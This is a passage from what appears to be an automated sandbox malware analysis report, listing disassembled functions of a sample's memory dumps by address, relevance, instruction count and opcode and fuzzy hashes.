                                        • Opcode ID: a486ece3840bf8919c9af982fb2261aa99230b160115d5cef495a503961ec72a
                                        • Instruction ID: 44dbb6bcb47e4b4f3a6e85ce3edd865f0e79879bc22f4a67390f4a3bb73aaaec
                                        • Opcode Fuzzy Hash: a486ece3840bf8919c9af982fb2261aa99230b160115d5cef495a503961ec72a
                                        • Instruction Fuzzy Hash: DA32A570B002069FEB94EB68D480BAEB7F2FB89310F148665D445EB355DB35DC46CBA1
                                        Function 07086300 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e596bb9172b1b2800ec8c6e7b9766dad51e1db1676108323fb98eb3372773e61
                                        • Instruction ID: dc3c59c052ea0bc38b00fde7494e7d11b125b0181c611d397d537207554b4bce
                                        • Opcode Fuzzy Hash: e596bb9172b1b2800ec8c6e7b9766dad51e1db1676108323fb98eb3372773e61
                                        • Instruction Fuzzy Hash: 1A61D3B1F000124FCF51AA7DC88466FBAD7AFC5620B16453AD80EDB361DE66DD0287C6
                                        Function 070843B3 Relevance: .2, Instructions: 225COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03a6bba31d01563559e0aa34c1b407234bc10f90cefece7a9e2d6fc3ac8de910
                                        • Instruction ID: e486e9d8654e9cafb01106d87ab9a285a9a774905696eb0daaca4c106e723b85
                                        • Opcode Fuzzy Hash: 03a6bba31d01563559e0aa34c1b407234bc10f90cefece7a9e2d6fc3ac8de910
                                        • Instruction Fuzzy Hash: 42815FB0B0020A9FDB94EFA8D55065EB7F6EF89304F108525E449DB394DF74DC468B92
                                        Function 070846CC Relevance: .2, Instructions: 217COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 38cfe76722640ae5da4c7053d4dbcc08198237d33011d0fc54b3ebc2cf77eb4c
                                        • Instruction ID: 5eb363db73844085af0afbe0e5f6a6b7f84b0ce7ef157b9ce430f16303bfb96f
                                        • Opcode Fuzzy Hash: 38cfe76722640ae5da4c7053d4dbcc08198237d33011d0fc54b3ebc2cf77eb4c
                                        • Instruction Fuzzy Hash: E4913E74E0021A8BDF60DF68C890B9DB7B1FF85310F208699D589AB255DB70AA85CB91
                                        Function 070846E0 Relevance: .2, Instructions: 210COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55d14319ef61cf8dec8639e555417d89646c3d9ba58463d85505be6b44f5bcb9
                                        • Instruction ID: 25b0460117f9980634ba888804e0a90bc9e23da4c6f33153e29b7b82863a119b
                                        • Opcode Fuzzy Hash: 55d14319ef61cf8dec8639e555417d89646c3d9ba58463d85505be6b44f5bcb9
                                        • Instruction Fuzzy Hash: D0912E74E0061A8BDF60DF68C880B9DB7B1FF89310F208699D54DAB355DB70AA85CF91
                                        Function 0708F031 Relevance: .2, Instructions: 204COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87abe5d8da459aa1b3c48b8115b67b1c8faab434a18388de7d95d2645b28de78
                                        • Instruction ID: 0d4997ebb1c04e961c6dbff16e76ff6ee28f6d444c95e39586194aacd5e92c24
                                        • Opcode Fuzzy Hash: 87abe5d8da459aa1b3c48b8115b67b1c8faab434a18388de7d95d2645b28de78
                                        • Instruction Fuzzy Hash: F7711A70A0020A9FDB54EFA9D980A9DBBF6FF88300F248529D449EB355DB30ED46CB51
                                        Function 0708F040 Relevance: .2, Instructions: 201COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9bf49b68a72d1779ee0ba88b23b9dc4060cb6f5988dc56b9b0de96beed1d1e53
                                        • Instruction ID: be6d222e69966102a1bc7b3a5365f8739d1fa7691791eef75ac976b0f8d3b838
                                        • Opcode Fuzzy Hash: 9bf49b68a72d1779ee0ba88b23b9dc4060cb6f5988dc56b9b0de96beed1d1e53
                                        • Instruction Fuzzy Hash: 7A711970A0020A9FDB54EFA9D980A9DBBF6FF88300F248529D449EB355DB70ED46CB51
                                        Function 0708FCC1 Relevance: .2, Instructions: 176COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33ca1548abc5208a052dca4304b3b5514795490d76bd6cc412c234061a8057b4
                                        • Instruction ID: 86d4f7cfdc2098362c3cd562aea90d4f7e4da44b46603f5ac14a802a8a19fe10
                                        • Opcode Fuzzy Hash: 33ca1548abc5208a052dca4304b3b5514795490d76bd6cc412c234061a8057b4
                                        • Instruction Fuzzy Hash: BF51F5B1A00206CFDF64FB78E4442ADB7B2FF88315F104A7AD14AD7251DB359955CB81
                                        Function 0708FA70 Relevance: .2, Instructions: 173COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21522ce75fe34d36c53c94b9ea3a6db65b28f6a30233497a9e8e6a6c998ab0c6
                                        • Instruction ID: 063e5a1ae75fdb86bde507e11437fa71f6583d3908ae67ffcb5c3e4973607666
                                        • Opcode Fuzzy Hash: 21522ce75fe34d36c53c94b9ea3a6db65b28f6a30233497a9e8e6a6c998ab0c6
                                        • Instruction Fuzzy Hash: D05138B07102068FFFA06A7CD99476F2B9AE789310F20492AE54ED7394C97DDC4583E2
                                        Function 0708FA80 Relevance: .2, Instructions: 163COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5822b7d7581c165f0c0e5e21f469046399def97fcb8795ab236e7e8553a097e3
                                        • Instruction ID: a65e3b33a7aa5a73bc5ac46f387cf92e2e2e4ce690c896ddc599796008361db9
                                        • Opcode Fuzzy Hash: 5822b7d7581c165f0c0e5e21f469046399def97fcb8795ab236e7e8553a097e3
                                        • Instruction Fuzzy Hash: DA5115B07102069FFFA06A7CC99472F269EE789310F20492AE54ED7394D96DDC4583E2
                                        Function 07085523 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af011b720525e6aba5f31c62ee49cdb3a170b7653b0c69895376ea3135de6521
                                        • Instruction ID: 549c6f3464e1af10cd61c5900db713c1effd32aea32917fa7af42d5c964e6bc7
                                        • Opcode Fuzzy Hash: af011b720525e6aba5f31c62ee49cdb3a170b7653b0c69895376ea3135de6521
                                        • Instruction Fuzzy Hash: B34154B1A006068FDF70DF99DC806AFFBF2EB54310F104A2AE156D7654D330E9658B91
                                        Function 0708DA90 Relevance: .1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c7067c1f26fc83b08a68b9398dab620c0539f8ab552012150b988b864bd3395
                                        • Instruction ID: 2ad2d964c6b42268c68bfdd9433a5bd309a74b501fffea6cbfa12fe6c2bbeeb4
                                        • Opcode Fuzzy Hash: 2c7067c1f26fc83b08a68b9398dab620c0539f8ab552012150b988b864bd3395
                                        • Instruction Fuzzy Hash: 7A318370A1020A9FCF55DF68C48069EF7F6FF89314F244629D445EB340EB71A9468B81
                                        Function 07082081 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcef44709049d80b0f3f94b4316e6d9972279a980036982ba84d8bba093cee36
                                        • Instruction ID: 2637b1d88755ba9072d3ed8c7f299a453b90cc9972729e2df62087df6c04ae5a
                                        • Opcode Fuzzy Hash: dcef44709049d80b0f3f94b4316e6d9972279a980036982ba84d8bba093cee36
                                        • Instruction Fuzzy Hash: 96319E71E0060A9BCF94DFA4D89469EB7F6FF89300F208529E946E7350DB70AD42CB91
                                        Function 07082090 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce8ccac98d2101ec6fec78eb0d48ae61541d1a38d7a1b4f21efb28652acff0ff
                                        • Instruction ID: 1b8d51dbd22e365d50f327d6d8f3ab0943de7b98de88058ce8a904a6e059bb0d
                                        • Opcode Fuzzy Hash: ce8ccac98d2101ec6fec78eb0d48ae61541d1a38d7a1b4f21efb28652acff0ff
                                        • Instruction Fuzzy Hash: 34317C71E0060A9BCF49DFA4D85469EB7F6FF89310F208529E946EB350DB70AC42CB91
                                        Function 07083FB9 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a76572f275f78d684e2da240e8f061a01020a57beca3ee5986568c90804f9bae
                                        • Instruction ID: e69a38696924feef1c493c82637a1e2d88756016096e628c3cbd2d33dba49934
                                        • Opcode Fuzzy Hash: a76572f275f78d684e2da240e8f061a01020a57beca3ee5986568c90804f9bae
                                        • Instruction Fuzzy Hash: CA318CB1B002169FCB50DF68E840AEEBBF1FB48710F108026E954EB390E735E9018B91
                                        Function 07083FC8 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e28fa25cdbd9ee7ff08763a8cd11a1e5ad6f05e498efc545387251723f81782e
                                        • Instruction ID: c290395793b50f09fbf06e4c02995b761c7d0ea191a7b395a33e17aa7ffdaf16
                                        • Opcode Fuzzy Hash: e28fa25cdbd9ee7ff08763a8cd11a1e5ad6f05e498efc545387251723f81782e
                                        • Instruction Fuzzy Hash: F2218BB5F002069FDB50DFA8D980EAEBBF5FB48610F108129E955EB390E735ED018B91
                                        Function 0187D030 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4161655851.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_187d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f66c167a9419baeba1d9a5329b2da6c16f7cbc5f52e9efddbbedee6dd07cdec1
                                        • Instruction ID: e1d1f0a0b65d224df441d4769e03bb0fd42b066731e0ff873323104e32a63120
                                        • Opcode Fuzzy Hash: f66c167a9419baeba1d9a5329b2da6c16f7cbc5f52e9efddbbedee6dd07cdec1
                                        • Instruction Fuzzy Hash: E1213471504204DFCB12DF58D9C0B26BBA5FF84318F24C66DD80A8B256C33AD547CA62
                                        Function 0187D1F8 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4161655851.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_187d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae9cdaa895bfcd1d30c5d9a174a3b28efcd09eeac3df4106e8aaf112d9668d89
                                        • Instruction ID: 405d0970e19cc2ef66f77b055ad721c25006e7aa0477ea28df755e99095feb30
                                        • Opcode Fuzzy Hash: ae9cdaa895bfcd1d30c5d9a174a3b28efcd09eeac3df4106e8aaf112d9668d89
                                        • Instruction Fuzzy Hash: 99214671514204DFDB01DF98D9C4B2ABB65FF84334F24C669E8098B246C33AE547CAA1
                                        Function 0187D3A8 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4161655851.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_187d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c5eb14e04480d49ff4ff416d30a37de562a201c40e7272c1020d1dca7866ef4
                                        • Instruction ID: e861545a4160bc6c542cd690db17ddb33b63f45e94eb99850eb8d69fab78d13f
                                        • Opcode Fuzzy Hash: 9c5eb14e04480d49ff4ff416d30a37de562a201c40e7272c1020d1dca7866ef4
                                        • Instruction Fuzzy Hash: FA2137B1504204DFDB05DF58D5C0B26BFA5FF84318F20C66DD9098B256C336E546CA61
                                        Function 07084310 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c2539a8dea8c9153a767bc518045b616ba2ad839346fd984e5d45f9ec5dd160
                                        • Instruction ID: ce7fdd92a2ae6928fb0d1d835d1d6217c94f7016cae4422f19cc1e984d95cc8f
                                        • Opcode Fuzzy Hash: 0c2539a8dea8c9153a767bc518045b616ba2ad839346fd984e5d45f9ec5dd160
                                        • Instruction Fuzzy Hash: 8C1145703041521FDBA19A7CD45031EBBEACFCA350F24843AF08ACB382DA65CC024382
                                        Function 070840D8 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 635acc775b2c20ff8380513b9f73104f6e5319b72df4d185447e8f459dae42e5
                                        • Instruction ID: cf0d7b0db254d7a00b103f41ff95c521f6d84c359661f5f453a29d0d0b557c13
                                        • Opcode Fuzzy Hash: 635acc775b2c20ff8380513b9f73104f6e5319b72df4d185447e8f459dae42e5
                                        • Instruction Fuzzy Hash: C6115E72B1012A5BDF94AA68CC14AAF73EBEBC8215F104539D50AE7344DE699C068B92
                                        Function 0708F2B0 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 677b6e6b5a9f85283b13a01430e16c4932a2047d8f9463cd3afd52873c9a25b0
                                        • Instruction ID: fb8e52bd97b03f88627394e9260291200383369cb81cc8a93a56273bb116cadf
                                        • Opcode Fuzzy Hash: 677b6e6b5a9f85283b13a01430e16c4932a2047d8f9463cd3afd52873c9a25b0
                                        • Instruction Fuzzy Hash: AB0128717001121FCBA2A67CE4547BE77E6DBCA320F24456AE44ACB341DA24DC078785
                                        Function 07083D93 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9aa04faabcd7e3ec91c67b7a6e42adb7294c1db84a84fe96f06767da4cb656be
                                        • Instruction ID: 552c433df54242a9a1fb078a9ee1cf8b22bb5b35d6244fed6f8c7eeafe2a03fc
                                        • Opcode Fuzzy Hash: 9aa04faabcd7e3ec91c67b7a6e42adb7294c1db84a84fe96f06767da4cb656be
                                        • Instruction Fuzzy Hash: 8E21C0B5D01259AFCB10DF9AD885ACEFFB8FB48314F10812AE518A7240C374A954CFA5
                                        Function 070840C9 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c48f5f70ee875ee873e0ed792782ee217f49ec8b09cd6f8f40514b1191a38b79
                                        • Instruction ID: 86971326e94f34e31d4514bfe8f3757d9bb985d32d6ec78b6dfaadf2bb0c41d8
                                        • Opcode Fuzzy Hash: c48f5f70ee875ee873e0ed792782ee217f49ec8b09cd6f8f40514b1191a38b79
                                        • Instruction Fuzzy Hash: 0701D476B0006A5BDFA4AA68DC10AEF73FBEBC8310F10413AE54AD7344DE649C064BD1
                                        Function 0187D1F3 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4161655851.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_187d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                        • Instruction ID: a58aedd98d03f39bd77940cfc52f3cc79386411a5ef44d070cf51cea20cd00c0
                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                        • Instruction Fuzzy Hash: D9119D76504280DFDB12CF54D5C4B16BF61FB84324F28C6AADC494B656C33AE50ACBA2
                                        Function 0187D3A3 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4161655851.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_187d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction ID: f14e8893e99c1ca0eb94a47f8f90ed87a0ae831d6f5328d25b81d5df0fa47780
                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction Fuzzy Hash: 5211BB75504280DFDB02CF54D5C4B55BFA2FB84314F28C6AAD9498B266C33AE44ACB62
                                        Function 0187D02B Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4161655851.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_187d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction ID: f67c4f3a2420c359bc92cc34d9399fe7160d0b21c97cfb2fba8d0180edbe88da
                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction Fuzzy Hash: 1711BB75504280CFDB12CF58D5C4B15FFA1FB84314F28C6AAD8498B666C33AD44ACB62
                                        Function 07083D98 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2ec21dde80a027eb7af30b2ae555abee8d1dd32598a52ebda1c4196e0f21b74
                                        • Instruction ID: c2ed79b575fda41c091b4aeae9866de9c292662fb537fa32da9f4c5c5cd631e8
                                        • Opcode Fuzzy Hash: f2ec21dde80a027eb7af30b2ae555abee8d1dd32598a52ebda1c4196e0f21b74
                                        • Instruction Fuzzy Hash: 4B11A2B5D01259EFCB00DF9AD884ADEFBB4FB48314F10852AE518A7250C374A954CFA5
                                        Function 07084320 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ab395dc4ad0992e8a594b43f873a8fb0729bd86865a21d7fb714ee023159c4b
                                        • Instruction ID: 82ed7b607a7447584b14db93bdc5b47601bc13e0beff5906df859600f75ce398
                                        • Opcode Fuzzy Hash: 5ab395dc4ad0992e8a594b43f873a8fb0729bd86865a21d7fb714ee023159c4b
                                        • Instruction Fuzzy Hash: 96016D717000165BDBA4EA6DE45072FB3DADBCA660F248539F14EC7350EA66DC024396
                                        Function 0708F2C0 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e1384c591117403ae07ca75852796138293ec42a27a7aa5e4e5e2ad1bfe0247
                                        • Instruction ID: cd3cc167a41d766e4f1c9b2eaf0e1427101bc7c316241616ae77611e26080086
                                        • Opcode Fuzzy Hash: 7e1384c591117403ae07ca75852796138293ec42a27a7aa5e4e5e2ad1bfe0247
                                        • Instruction Fuzzy Hash: C801A4717000121BDBA5E67DE45472EB3DADBC9620F148939E50ECB340DE25EC034785
                                        Function 0708A428 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9699b30642b0612577c582e064424952e776dbb358ee51556d243b4b9037ee7
                                        • Instruction ID: e65a430f13281ca0b9be65faed86ad6abca5890d376d2219036e57e30ec406b5
                                        • Opcode Fuzzy Hash: f9699b30642b0612577c582e064424952e776dbb358ee51556d243b4b9037ee7
                                        • Instruction Fuzzy Hash: 3C01ADB07000154BCBA0EA6CE45472AB3DAEBCA724F149629E10ECB360DA66DC024782

                                        Non-executed Functions

                                        Function 070877B0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2222239885
                                        • Opcode ID: 39749ee3f591edd31c092148493fc4fcde0cb8dcb44ac9afbabf5f847eb16596
                                        • Instruction ID: 1ec1f64f53cafc54c84af04989d73362e4348cd5264532e63852abf9e4364765
                                        • Opcode Fuzzy Hash: 39749ee3f591edd31c092148493fc4fcde0cb8dcb44ac9afbabf5f847eb16596
                                        • Instruction Fuzzy Hash: A8122070A00219CFDB68EFA9C854A9DB7F2BF85704F209669D449AB358DB30DD85CF81
                                        Function 0708AA48 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3823777903
                                        • Opcode ID: 170b3debc6802ddd003bc3bd2e14993a83c52a9d6f6b36cbd54f65a0866bc96f
                                        • Instruction ID: 79e64c542cba76f65a8b2644c6bcc5a5daa3a2048af5f3f0672d2f78baf1c3a3
                                        • Opcode Fuzzy Hash: 170b3debc6802ddd003bc3bd2e14993a83c52a9d6f6b36cbd54f65a0866bc96f
                                        • Instruction Fuzzy Hash: D2915BF0B0020ADFDBA8EB68D554B6EB7F2BF84300F10862AD4429B755DB749D45CB91
                                        Function 070871B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
